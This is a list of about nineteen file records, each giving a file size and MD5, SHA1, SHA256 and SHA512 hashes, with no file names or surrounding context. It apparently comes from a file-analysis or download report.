  SHA1: 19350257e42d7aee17fb3bf139a9d3adb330fad4
  SHA256: b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
  SHA512: 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
- Filesize: 56KB
  MD5: 752a1f26b18748311b691c7d8fc20633
  SHA1: c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
  SHA256: 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
  SHA512: a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
- Filesize: 64KB
  MD5: 66d39af15a10e83a9884124905a15c09
  SHA1: 2b267df58512d6e9a886a56e90ef3c712321d5fb
  SHA256: a98c690305e53279d2ebf38aceee72eba4b453afb7c3c39af8e65fced8d6d6b1
  SHA512: 9dda58c035d255e762502d2bca5141692f0e5fe1a3ad1c9a8a828ffded4f5ca86c57e1c2a42a6d5ee61c733290ffa47577b8cfedb98b5e1be8f7311e12b17189
- Filesize: 872KB
  MD5: 6ee7ddebff0a2b78c7ac30f6e00d1d11
  SHA1: f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
  SHA256: 865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
  SHA512: 57d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
- Filesize: 870KB
  MD5: a91c6eadc37c8082fcd0d8fd1762b8fe
  SHA1: 73ce49f75160ed5dafb1b8483111f5d383e919c2
  SHA256: 4b47058fa38dcae6c5f596fad0f2dcea2071b59e8d8a7b9e26a8585cf7119b69
  SHA512: 0a5e077e0241941b8d6032dc8920a363a8bddbde52cfef940940da5d0a7244febf22824a290c75741d450ae4dd099bfcba1f20b99dcdbb1e06cfcbf4546460b8
- Filesize: 13KB
  MD5: b51276964bb7d7ced0ca782c1505d9ca
  SHA1: 961d8f2ed348d6bfe38f109e97ab8b55db14591c
  SHA256: 55cc097b9fcc03fd4c728618889b48973ed7bcf36057edd819ef475f4aca9403
  SHA512: fd485c564a64fdb53546c5ddee7dbd52fffea81405d81f49d3a7e1081f892f720120448ecb11190623e7e909683170ece6abaea090cdc857b62b17f1a9d2c547
- Filesize: 280KB
  MD5: d63c5479fd18f86817d489744a338751
  SHA1: 82385a52bb5485fab0a3d1e7f9a3661bf35d3098
  SHA256: 3f7aa56dfd875ebf6e3aa86be897f65302f88e4022cf2dc984fdb4ac9cff0037
  SHA512: da8a157239ef59e683b2ad06492136cfc52550af0947bb812fc7795f02ab0e09cf510b701a9e247b0ec197879028778a0af8daf01589d1a53090aa4f91bf0361
- Filesize: 139KB
  MD5: 569505062321992f4e2803461c40e724
  SHA1: b62f7987f92b4397b02b6894e759096fdee1f7db
  SHA256: 748a3b063eff70ed5ba8a3a2590f409e5ec79d84d402abae5bb26b42e204e434
  SHA512: 2d23a0322100f570f2298230338c68bd23b683cae2e9a0f27bd5098a6f1c15699d3ba77a319786df34a60739a79f863adb190b6c3aa5fbc06030ae1872cb71fd
- Filesize: 278KB
  MD5: 6ff11c454a1191120b1f963b120ae6b1
  SHA1: 9476d445caccd7a725836c102154e4ba17cbc969
  SHA256: b0ba9def393d4b5c8f560143c57b6c6a88a057c0291515ade7fa8fb195e03898
  SHA512: fee76d9d7d4b824b224b8c7d459f4c75aa8003424395cb3bcfa797fd96115dacacce8b860b3e080ee114e2030e8623675371c9a1212ee4499ed95b62768b4754
- Filesize: 221KB
  MD5: ec92f2e791b5ca001d95fdd601cd73b3
  SHA1: 4aec16ee635e9eea9732a45d79f9ab8393e966fa
  SHA256: ec34737bf586761c5b037e97e4fb4351cf6759e8ce40e5dbaabfe60a44be5179
  SHA512: 6a5fde00eabb3e36e698b9dc9a5417ab58cbdb866d75a3b49885974b8a1995b64c094532324e9e4187d76990b02910845e63ca00d9bc2026ae77819a5708bd3b
- Filesize: 101KB
  MD5: 2e6d79912a858f8e13ce1384b18495d1
  SHA1: a509ff203fcd463cc11ec1ebbe5cee251a2d3c04
  SHA256: a6ac2704a4b63eaf27bc0a2d100a999176f494e7122efe8f633e51c0e2c42ace
  SHA512: 707d88b54f2df459d331305d36486a38a4ba0fa30834f2331c599f2d1ed4ba25e1c24eccf116454c24e98129c66ae13ce7d2621aa5dd03da92046c42eb3e6af5
- Filesize: 214KB
  MD5: 0d90f78364d6b146463b6238e692b0f9
  SHA1: 241f0eec297841a66f19e29d322533dc59088272
  SHA256: ce3e3978e4a8bc847c6307d7ec6e532067e538e98956fc0daade2110f29da540
  SHA512: 169a26bd6bed4c0a2d3af69ba649d5f4044513a87b35d75d7f1285c3f2cbdb25c3e98c5a7ebeb6a26ef87b6206b83ec18df1e016dcd7c3747d1f61211cd0a610
- Filesize: 224KB
  MD5: bca8514ec872114f197260671806ec5d
  SHA1: b61846c56e14ed5e819050bd638a49505133889b
  SHA256: 862e4b3baeb552ed218606848f4014bdb2d51b7cd35dd6d36804973f2c7ec4f5
  SHA512: 3a6300c19487013e1cce2a0a2ddcf392e872b14f31e5d35d7422848af4026dc7806dfd2c39a4028a86d3e781c075b069fa84cb280c1392bb5fdcedaec5c4109b
- Filesize: 154KB
  MD5: 3443eaa164d930308366fbc11d04c2fc
  SHA1: 9470e59283644f44d76ecb945c394d43bb09e15e
  SHA256: 6fe6f3a3d2e4589b74eec63e6f463c62e5373dca19972ac2db1a7ad9388c033b
  SHA512: 7ecdc5a2bd98ef7b8ddec6ab3d10f6ef6ce8c0cffc08ac032f14dae46ba1f710b3a86b4d9f950f7ae4fc1ab2379e3771a9b6b9bcb8d3358c5c7ff96e21b48b1a
- Filesize: 131KB
  MD5: aa48266704d06ef9043c5521d52fddd0
  SHA1: 37754ad688f17e227ba8028efe9127d15c08b922
  SHA256: 5970fe292d0ac770fcaf67e01e99e913426519285180ecb4638859d6969fc444
  SHA512: 017ea9572c60918ef9cdb81d6c54fba387434874d4335e76a05f4da9eccc8705c38c1811e152c4bf533188bebb26edc4437743eccb750d522e844af70225f840
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- Filesize: 1.0MB
  MD5: 2366f34130db5f39d0d5255782974392
  SHA1: 6323dd08850cdea997298f91f74078cf0c8e78a2
  SHA256: 9e495b41518154b5c5cb3fff866aa26c894adf164b2639f05ba23bb5e75be5ef
  SHA512: e1a86be3970385627fd110d18a9ba56034cd601c046dbcead2bb5e1e4d0b665c8693c2a0cbd15b3f373b4c018579114640c6d0d0de41081cabae1e424c580803
- Filesize: 18KB
  MD5: da49bbe37855af62a6a8809453d17b83
  SHA1: 1f59e84376b2acda296b1b431a16e5cd5dfb7da8
  SHA256: 229defbb0cee6f02673a5cde290d0673e75a0dc31cec43989c8ab2a4eca7e1bb
  SHA512: 4aa87ac380cc78375170b08767edac27929fdacceeec84f555dd249239722064388803e675e0ec95c06487cd2c158b83cd768f08d61ee57515e5c52f191f7cd0